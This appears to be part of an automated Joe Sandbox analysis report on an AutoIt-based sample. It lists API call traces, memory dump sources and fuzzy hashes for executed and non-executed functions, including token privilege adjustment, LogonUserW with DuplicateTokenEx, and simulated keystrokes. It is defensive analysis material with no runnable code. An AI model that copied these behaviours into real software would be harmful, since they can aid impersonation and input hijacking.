                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: d0bbfdb6f4dcb4edd628830a87cafc28e38b3c536f8607184b55dce9ed8f4c7c
                                              • Instruction ID: 9022e5501bdab575a7b3ff5ee07951687816621190911ea2dc6e505bf6025572
                                              • Opcode Fuzzy Hash: d0bbfdb6f4dcb4edd628830a87cafc28e38b3c536f8607184b55dce9ed8f4c7c
                                              • Instruction Fuzzy Hash: B5E0ED31102324AAEB212B779C04F9A3A5AEF837B0F190220BC44A2581DB29DE0282F0
                                              Function 00D74F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                              Download Yara Rule
                                              APIs
                                              • FreeLibrary.KERNEL32(?,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74F6D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: FreeLibrary
                                              • String ID:
                                              • API String ID: 3664257935-0
                                              • Opcode ID: 36ea80680c813c2b11786c50c4cce33d7f559bd3562e531b009e856c14c84af0
                                              • Instruction ID: f8b715a56a6a59662dac638801f982eed15a317780101186bbdc56d4344c56a6
                                              • Opcode Fuzzy Hash: 36ea80680c813c2b11786c50c4cce33d7f559bd3562e531b009e856c14c84af0
                                              • Instruction Fuzzy Hash: 69F0157110A752CFDB359F64D490822FBE4EF15329324CA6EE1EE82621D7329888DB20
                                              Function 00D72DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D72DC4
                                                • Part of subcall function 00D76B57: _wcslen.LIBCMT ref: 00D76B6A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: LongNamePath_wcslen
                                              • String ID:
                                              • API String ID: 541455249-0
                                              • Opcode ID: 5d282ad0af7695ba6eff10b843554f666cde022179558c7f72271a386606c6aa
                                              • Instruction ID: fb0e501646e1ba60520b960cb726dc066875fd13d221bb737d9e82afb4a9220e
                                              • Opcode Fuzzy Hash: 5d282ad0af7695ba6eff10b843554f666cde022179558c7f72271a386606c6aa
                                              • Instruction Fuzzy Hash: 12E0C276A042245BCB20A3989C06FEA77EDDFC8790F0441B1FD09E7259EA60ED84C6B0
                                              Function 00DE2693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: __fread_nolock
                                              • String ID:
                                              • API String ID: 2638373210-0
                                              • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                              • Instruction ID: 45f52247410664acacdee655941f9af3491195bcaeb89ace0815afbc29f94d3e
                                              • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                              • Instruction Fuzzy Hash: DDE04FB0609B005FDF39AA28A8517B677E8DF49300F04096EF69B82252E57268458A6D
                                              Function 00D72B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D73837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D73908
                                                • Part of subcall function 00D7D730: GetInputState.USER32 ref: 00D7D807
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00D72B6B
                                                • Part of subcall function 00D730F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00D7314E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                              • String ID:
                                              • API String ID: 3667716007-0
                                              • Opcode ID: 576f4b5d587a639934a0e657dcb6b60546411ace24f454f07c74d8d3caed58aa
                                              • Instruction ID: 877eef3d9295319a9e8821ba8d2af7f0927beb9f3d35197134066de52566c724
                                              • Opcode Fuzzy Hash: 576f4b5d587a639934a0e657dcb6b60546411ace24f454f07c74d8d3caed58aa
                                              • Instruction Fuzzy Hash: C1E0862230424806CB08BB75A85357DB759DBE6351F40957EF15A631A3EF25498A4272
                                              Function 00DB039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNELBASE(00000000,00000000,?,00DB0704,?,?,00000000,?,00DB0704,00000000,0000000C), ref: 00DB03B7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 9e247a467790ae1cabc5d06c3cd021d99ac70a8b9e85c10e109db1e9c7f47101
                                              • Instruction ID: 206029e4bd219b0a3caa76f2a094b7108fb2c6bc57e44eb7dd252a0a5274b61e
                                              • Opcode Fuzzy Hash: 9e247a467790ae1cabc5d06c3cd021d99ac70a8b9e85c10e109db1e9c7f47101
                                              • Instruction Fuzzy Hash: 2AD06C3204010DBFDF028F85DD06EDA3BAAFB48714F114100BE5866020C732E861AB90
                                              Function 00D71CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                              Download Yara Rule
                                              APIs
                                              • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00D71CBC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: InfoParametersSystem
                                              • String ID:
                                              • API String ID: 3098949447-0
                                              • Opcode ID: a2b13c3aaf896d0cbd4ca17daeb107afdbc0e56c94f7d2ee5824b7568bd0d05b
                                              • Instruction ID: 2a26624c32a19faa042157f57823a87ad5a435a59ecc58265b462b7569599fce
                                              • Opcode Fuzzy Hash: a2b13c3aaf896d0cbd4ca17daeb107afdbc0e56c94f7d2ee5824b7568bd0d05b
                                              • Instruction Fuzzy Hash: 1EC0923E280304AFF6148B82BC4AF1077A4A34DF00F548001F709B95E3C3A228AAEA51
                                              Function 00DCD8DD Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00DCD8E9
                                                • Part of subcall function 00D733A7: _wcslen.LIBCMT ref: 00D733AB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: PathTemp_wcslen
                                              • String ID:
                                              • API String ID: 1974555822-0
                                              • Opcode ID: fb46aada2bbbffdfb6114dbd85055c46f6221057075c93da571957ce0f73282f
                                              • Instruction ID: 3d6dbe54ee0ba5dd465a2aa5cbf26d68c6d7556460cb98429dc727afd2741388
                                              • Opcode Fuzzy Hash: fb46aada2bbbffdfb6114dbd85055c46f6221057075c93da571957ce0f73282f
                                              • Instruction Fuzzy Hash: 1BC04C7450105A9FDB90AB90CCC9BA9B324EF00301F108095F149510509E709A899B21
                                              Function 00DE744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D75745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00D7949C,?,00008000), ref: 00D75773
                                              • GetLastError.KERNEL32(00000002,00000000), ref: 00DE76DE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CreateErrorFileLast
                                              • String ID:
                                              • API String ID: 1214770103-0
                                              • Opcode ID: 220f7c75209cce8cbc065475ee57e99642ec2f066fd7d6edc8fcc719adf76b90
                                              • Instruction ID: 1b1cf66e5f74b620a0282c0fefaa93bf96d5817f57af51fdff82996c4e2b9c8c
                                              • Opcode Fuzzy Hash: 220f7c75209cce8cbc065475ee57e99642ec2f066fd7d6edc8fcc719adf76b90
                                              • Instruction Fuzzy Hash: 208180302087419FC755EF28C491A69B7E1FF89314F08855DF88A5B2A2EB70ED45CBB2
                                              Function 01043510 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNELBASE(000001F4), ref: 01043521
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1797146074.0000000001041000.00000040.00000020.00020000.00000000.sdmp, Offset: 01041000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1041000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                              • Instruction ID: 6fc0154ea2530c1ca9b298a541e371c446d4e68fa45cf5736169641494f5f73c
                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                              • Instruction Fuzzy Hash: 95E0BF7494010D9FDB00EFA4D54969E7BB4EF04301F1001A1FD0192281D6309A608A62

                                              Non-executed Functions

                                              Function 00E09576 Relevance: 68.9, APIs: 36, Strings: 3, Instructions: 625windowkeyboardnativeCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
                                              • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 00E0961A
                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E0965B
                                              • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00E0969F
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E096C9
                                              • SendMessageW.USER32 ref: 00E096F2
                                              • GetKeyState.USER32(00000011), ref: 00E0978B
                                              • GetKeyState.USER32(00000009), ref: 00E09798
                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E097AE
                                              • GetKeyState.USER32(00000010), ref: 00E097B8
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E097E9
                                              • SendMessageW.USER32 ref: 00E09810
                                              • SendMessageW.USER32(?,00001030,?,00E07E95), ref: 00E09918
                                              • SetCapture.USER32(?), ref: 00E0994A
                                              • ClientToScreen.USER32(?,?), ref: 00E099AF
                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E099D6
                                              • ReleaseCapture.USER32 ref: 00E099E1
                                              • GetCursorPos.USER32(?), ref: 00E09A19
                                              • ScreenToClient.USER32(?,?), ref: 00E09A26
                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E09A80
                                              • SendMessageW.USER32 ref: 00E09AAE
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E09AEB
                                              • SendMessageW.USER32 ref: 00E09B1A
                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00E09B3B
                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00E09B4A
                                              • GetCursorPos.USER32(?), ref: 00E09B68
                                              • ScreenToClient.USER32(?,?), ref: 00E09B75
                                              • GetParent.USER32(?), ref: 00E09B93
                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E09BFA
                                              • SendMessageW.USER32 ref: 00E09C2B
                                              • ClientToScreen.USER32(?,?), ref: 00E09C84
                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E09CB4
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E09CDE
                                              • SendMessageW.USER32 ref: 00E09D01
                                              • ClientToScreen.USER32(?,?), ref: 00E09D4E
                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00E09D82
                                                • Part of subcall function 00D89944: GetWindowLongW.USER32(?,000000EB), ref: 00D89952
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E09E05
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease
                                              • String ID: @GUI_DRAGID$F$p#
                                              • API String ID: 1312020300-638943876
                                              • Opcode ID: d25e31c1cb3794c6af39800757546c7f219c14064d97480db30dff9f43d831be
                                              • Instruction ID: 0ebe915e217ca16e6e2607140b060296bf25044b5ea74c0d90bfd6b4a7baf4ef
                                              • Opcode Fuzzy Hash: d25e31c1cb3794c6af39800757546c7f219c14064d97480db30dff9f43d831be
                                              • Instruction Fuzzy Hash: 2842B134208201AFDB24CF24DC44EAABBE5FF89714F141619F699A72E2D732D895CF52
                                              Function 00E04873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00E048F3
                                              • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00E04908
                                              • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00E04927
                                              • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00E0494B
                                              • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00E0495C
                                              • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00E0497B
                                              • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00E049AE
                                              • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00E049D4
                                              • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00E04A0F
                                              • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00E04A56
                                              • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00E04A7E
                                              • IsMenu.USER32(?), ref: 00E04A97
                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E04AF2
                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E04B20
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E04B94
                                              • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00E04BE3
                                              • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00E04C82
                                              • wsprintfW.USER32 ref: 00E04CAE
                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E04CC9
                                              • GetWindowTextW.USER32(?,00000000,00000001), ref: 00E04CF1
                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00E04D13
                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E04D33
                                              • GetWindowTextW.USER32(?,00000000,00000001), ref: 00E04D5A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                              • String ID: %d/%02d/%02d
                                              • API String ID: 4054740463-328681919
                                              • Opcode ID: 18ffccdbaa00e556433a8351ce6f48668fc4c4ec8856de0b0626fbb7da6e78b6
                                              • Instruction ID: 5c4aaee6e544ad5789e746dbf16eadaf916a140b261abebdd8c1ee72493920fb
                                              • Opcode Fuzzy Hash: 18ffccdbaa00e556433a8351ce6f48668fc4c4ec8856de0b0626fbb7da6e78b6
                                              • Instruction Fuzzy Hash: 761200F1600205AFEB259F24CD49FAE7BB8EF85704F105229F615FA1E0DB749A81CB60
                                              Function 00D8F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00D8F998
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DCF474
                                              • IsIconic.USER32(00000000), ref: 00DCF47D
                                              • ShowWindow.USER32(00000000,00000009), ref: 00DCF48A
                                              • SetForegroundWindow.USER32(00000000), ref: 00DCF494
                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00DCF4AA
                                              • GetCurrentThreadId.KERNEL32 ref: 00DCF4B1
                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00DCF4BD
                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00DCF4CE
                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00DCF4D6
                                              • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00DCF4DE
                                              • SetForegroundWindow.USER32(00000000), ref: 00DCF4E1
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DCF4F6
                                              • keybd_event.USER32(00000012,00000000), ref: 00DCF501
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DCF50B
                                              • keybd_event.USER32(00000012,00000000), ref: 00DCF510
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DCF519
                                              • keybd_event.USER32(00000012,00000000), ref: 00DCF51E
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DCF528
                                              • keybd_event.USER32(00000012,00000000), ref: 00DCF52D
                                              • SetForegroundWindow.USER32(00000000), ref: 00DCF530
                                              • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00DCF557
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 4125248594-2988720461
                                              • Opcode ID: 4fd8ef18237793e6bd8a0ade4893e0f9b021d516ee4459055bcf7ada4364814d
                                              • Instruction ID: f551485c64166c1ed86fb07bdfe64414333f816b27d2a2af46cc12e94bbc858d
                                              • Opcode Fuzzy Hash: 4fd8ef18237793e6bd8a0ade4893e0f9b021d516ee4459055bcf7ada4364814d
                                              • Instruction Fuzzy Hash: C1316571A402187FEB206BB69C49FBF7E6DEB44B50F24016AF601F71D1C6B29D40AA71
                                              Function 00DD1201 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 241COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00DD16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DD170D
                                                • Part of subcall function 00DD16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DD173A
                                                • Part of subcall function 00DD16C3: GetLastError.KERNEL32 ref: 00DD174A
                                              • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00DD1286
                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00DD12A8
